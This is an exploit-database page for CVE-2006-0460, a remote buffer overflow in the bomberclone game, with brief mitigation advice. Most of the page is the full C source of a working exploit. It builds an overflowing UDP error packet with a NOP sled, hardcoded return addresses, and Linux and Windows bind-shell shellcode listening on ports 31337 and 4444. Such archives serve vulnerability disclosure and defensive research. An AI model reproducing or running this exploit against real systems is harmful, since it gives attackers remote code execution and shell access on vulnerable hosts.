header-logo
Suggest Exploit
vendor:
bomberclone
by:
escazoo@yahoo.com
7.5
CVSS
HIGH
Remote Code Execution
119
CWE
Product Name: bomberclone
Affected Version From: 0.11.6.2
Affected Version To: 0.11.6.2
Patch Exists: NO
Related CWE: CVE-2006-0460
CPE: a:bomberclone:bomberclone:0.11.6.2
Metasploit: https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2006-0460/
Other Scripts:
Platforms Tested: Linux, Windows
2006

bomberclone < 0.11.6.2 remote exploit

This exploit targets a vulnerability in bomberclone version 0.11.6.2. It allows an attacker to execute arbitrary code on the target system. The exploit code includes shellcode for both Linux and Windows systems. The Linux shellcode performs a bind shell on port 31337, while the Windows shellcode binds to port 4444. The exploit code is written in C.

Mitigation:

The vulnerability can be mitigated by updating the bomberclone software to a version higher than 0.11.6.2. Additionally, system administrators should ensure that the software is running with minimal privileges.
Source

Exploit-DB raw data:

/*
 * bomberclone < 0.11.6.2 remote exploit
 * CVE-2006-0460
 * 3/14/06
 * escazoo@yahoo.com
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/* fork() + bind() port 31337 - ty izik */
char linux_shellcode[]= 
"\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02\x89\xe1\xcd\x80"              
"\x5b\x5d\x52\x66\xbd\x69\x7a\x0f\xcd\x09\xdd\x55\x6a\x10\x51"                  
"\x50\x89\xe1\xb0\x66\xcd\x80\xb3\x04\xb0\x66\xcd\x80\x5f\x50"                  
"\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80\x93\xb0\x02\xcd\x80\x85\xc0"             
"\x75\x1a\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73"
"\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\xeb\xb2\x6a\x06\x58"                 
"\xcd\x80\xb3\x04\xeb\xc9";            

/* bind shell to 4444 - metasploit */
char win32_shellcode[] =
"\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x36"
"\xbc\x74\xb1\x83\xeb\xfc\xe2\xf4\xca\xd6\x9f\xfc\xde\x45\x8b\x4e"
"\xc9\xdc\xff\xdd\x12\x98\xff\xf4\x0a\x37\x08\xb4\x4e\xbd\x9b\x3a"
"\x79\xa4\xff\xee\x16\xbd\x9f\xf8\xbd\x88\xff\xb0\xd8\x8d\xb4\x28"
"\x9a\x38\xb4\xc5\x31\x7d\xbe\xbc\x37\x7e\x9f\x45\x0d\xe8\x50\x99"
"\x43\x59\xff\xee\x12\xbd\x9f\xd7\xbd\xb0\x3f\x3a\x69\xa0\x75\x5a"
"\x35\x90\xff\x38\x5a\x98\x68\xd0\xf5\x8d\xaf\xd5\xbd\xff\x44\x3a"
"\x76\xb0\xff\xc1\x2a\x11\xff\xf1\x3e\xe2\x1c\x3f\x78\xb2\x98\xe1"
"\xc9\x6a\x12\xe2\x50\xd4\x47\x83\x5e\xcb\x07\x83\x69\xe8\x8b\x61"
"\x5e\x77\x99\x4d\x0d\xec\x8b\x67\x69\x35\x91\xd7\xb7\x51\x7c\xb3"
"\x63\xd6\x76\x4e\xe6\xd4\xad\xb8\xc3\x11\x23\x4e\xe0\xef\x27\xe2"
"\x65\xef\x37\xe2\x75\xef\x8b\x61\x50\xd4\x65\xed\x50\xef\xfd\x50"
"\xa3\xd4\xd0\xab\x46\x7b\x23\x4e\xe0\xd6\x64\xe0\x63\x43\xa4\xd9"
"\x92\x11\x5a\x58\x61\x43\xa2\xe2\x63\x43\xa4\xd9\xd3\xf5\xf2\xf8"
"\x61\x43\xa2\xe1\x62\xe8\x21\x4e\xe6\x2f\x1c\x56\x4f\x7a\x0d\xe6"
"\xc9\x6a\x21\x4e\xe6\xda\x1e\xd5\x50\xd4\x17\xdc\xbf\x59\x1e\xe1"
"\x6f\x95\xb8\x38\xd1\xd6\x30\x38\xd4\x8d\xb4\x42\x9c\x42\x36\x9c"
"\xc8\xfe\x58\x22\xbb\xc6\x4c\x1a\x9d\x17\x1c\xc3\xc8\x0f\x62\x4e"
"\x43\xf8\x8b\x67\x6d\xeb\x26\xe0\x67\xed\x1e\xb0\x67\xed\x21\xe0"
"\xc9\x6c\x1c\x1c\xef\xb9\xba\xe2\xc9\x6a\x1e\x4e\xc9\x8b\x8b\x61"
"\xbd\xeb\x88\x32\xf2\xd8\x8b\x67\x64\x43\xa4\xd9\xd9\x72\x94\xd1"
"\x65\x43\xa2\x4e\xe6\xbc\x74\xb1";

struct pkgheader {
 unsigned char typ;
 unsigned char flags;
 signed short id; 
 signed short led;
} pkgheader;

struct pkg_error {
 struct pkgheader h;
 unsigned char nr;
 char text[816];
} pkg_error;

int main(int argc, char *argv[]) {
 char *ptr;
 int sockfd, i;
 long *addrptr, ret;
 struct sockaddr_in vict;
 
 if(argc < 4) {
  fprintf(stderr, "%s IP Port [target]\n", argv[0]);
  return -2;
 }

 
 memset(pkg_error.text, 0x90, sizeof(pkg_error.text));
 if(!strcmp(argv[3], "win32")) {
  ret = 0x77dab1da;
  memcpy(pkg_error.text + 701 - strlen(win32_shellcode), win32_shellcode, strlen(win32_shellcode));
 }
 else {
  ret = 0xbffff164;
  memcpy(pkg_error.text + 701 - strlen(linux_shellcode), linux_shellcode, strlen(linux_shellcode));
 }
 
 pkg_error.h.typ = 0; 
 pkg_error.h.flags = 0;
 pkg_error.h.led = sizeof(struct pkg_error);
 pkg_error.nr = 'A';

 ptr = pkg_error.text + 732;
 addrptr = (long *)ptr;  
 for(i = 732; i < sizeof(pkg_error.text); i+=4)
  *(addrptr++) = ret;

 vict.sin_family = PF_INET;
 vict.sin_port = htons(atoi(argv[2]));
 vict.sin_addr.s_addr = inet_addr(argv[1]);
 memset(&(vict.sin_zero), '\0', 8);

 if((sockfd = socket(PF_INET, SOCK_DGRAM, 0)) < 0) {
  perror("socket");
  return -1;
 }

 if(connect(sockfd, (struct sockaddr *)&vict,
 sizeof(vict)) < 0) {
  perror("connect");
  return -1;
 }

 if(send(sockfd, &pkg_error, sizeof(pkg_error), 0) < 0) {
  perror("send");
  return -1;
 }
 
 close(sockfd); 

 return 0;
}

// milw0rm.com [2006-03-22]

Navigation

Suggest Exploit

Services By CQR